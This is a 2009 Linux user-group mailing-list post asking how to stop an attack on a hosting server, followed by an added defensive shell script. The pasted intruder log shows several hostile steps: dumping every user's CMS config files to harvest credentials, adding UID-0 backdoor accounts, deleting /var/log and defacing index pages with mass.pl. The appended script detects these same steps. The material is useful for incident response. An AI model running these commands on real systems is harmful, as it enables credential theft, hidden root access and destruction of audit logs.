[GLLUG] server attack

Eduardo Cesconetto eduardo at cesconetto.com
Sun Sep 20 20:28:36 EDT 2009


A friend's hosting server is being attacked by somebody using mass.pl
to change the index.html files in all the user folders; here is part of a
log:

cd ..
cat /home/*/public_html/configuration.php > hard.txt
useradd -o -u 0 sshdd
/usr/sbin/useradd -o -u 0 sshdd
passwd sshdd
/usr/sbin/useradd -o -u 0 apachee
passwd apachee
/usr/sbin/useradd -o -u 0 apach
passwd apach
/etc/init.d/sshd restart
/etc/init.d/sshd stop
/etc/init.d/sshd start
rm hard.txt
cat /home/*/public_html/config.php > hard.txt
ls -lia
rm hard.txt
cd ..
cat /home/*/public_html/config.php > hard.txt
rm hard.txt
cat /home/*/public_html/configuration.php > hard.txt
rm hard.txt
cat /home/*/public_html/wp-config.php > hard.txt
rm hard.txt
ls -lia /etc
ls /etc/valiases > hard.txt
rm hard.txt
ls -lia /etc/valiases > hard.txt
ls -lia /
rm -r var/log
rm -r /var/log
mkdir /var/log
ls -lia
crm user1
rm user1.php
cd cgi-bin
ls -lia
rm -r hard
cd ..
rm hard
cd cgi-bin
cd ..
rm hard.txt
cd cgi-bin
ls -lia
pwd
perl mass.pl
perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/ hard.html
perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/ hard.html
perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/ hard.html
[9/20/09 7:13:55 PM] konrath: I found this up above



Any ideas on how to stop this?
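
An added example, not part of the original post: a shell audit for two things the log shows, extra accounts holding UID 0 (what `useradd -o -u 0` creates) and the matching commands in a shell history file. The function names and the sample passwd and history contents are constructed for illustration, reusing the account names and commands from the log.

```shell
#!/bin/sh
# Added example (not from the original post): audit for the changes visible in the log.

# Accounts other than root that hold UID 0, which is what `useradd -o -u 0 NAME` creates.
# $1: passwd-format file (default /etc/passwd)
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# History lines matching actions from the log: non-unique UID 0 account creation,
# removal of /var/log, and wildcard reads of per-user CMS config files.
# $1: shell history file. Prints "lineno:command"; returns 0 even when nothing matches.
suspicious_history() {
    grep -nE \
        -e 'useradd .*-o .*-u 0( |$)' \
        -e 'rm -r[a-z]* /var/log' \
        -e 'cat /home/\*/public_html/[A-Za-z_-]*config[A-Za-z]*\.php' \
        "$1" || true
}

# Constructed sample data (account names and commands copied from the log).
write_samples() {
    dir=$1
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshdd:x:0:0::/home/sshdd:/bin/bash
apachee:x:0:0::/home/apachee:/bin/bash
apach:x:0:0::/home/apach:/bin/bash
EOF
    cat > "$dir/history" <<'EOF'
cd ..
cat /home/*/public_html/configuration.php > hard.txt
/usr/sbin/useradd -o -u 0 sshdd
passwd sshdd
ls -lia /etc
rm -r /var/log
mkdir /var/log
cat /home/*/public_html/wp-config.php > hard.txt
EOF
}

# Demo on the constructed samples when invoked with the argument "demo".
if [ "${1:-}" = "demo" ]; then
    tmp=$(mktemp -d) && write_samples "$tmp"
    uid0_accounts "$tmp/passwd"; suspicious_history "$tmp/history"
    rm -rf "$tmp"
fi
```

Because the log also shows `/var/log` being removed, the passwd check is the more dependable of the two: it reads current account state rather than records the intruder could delete.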



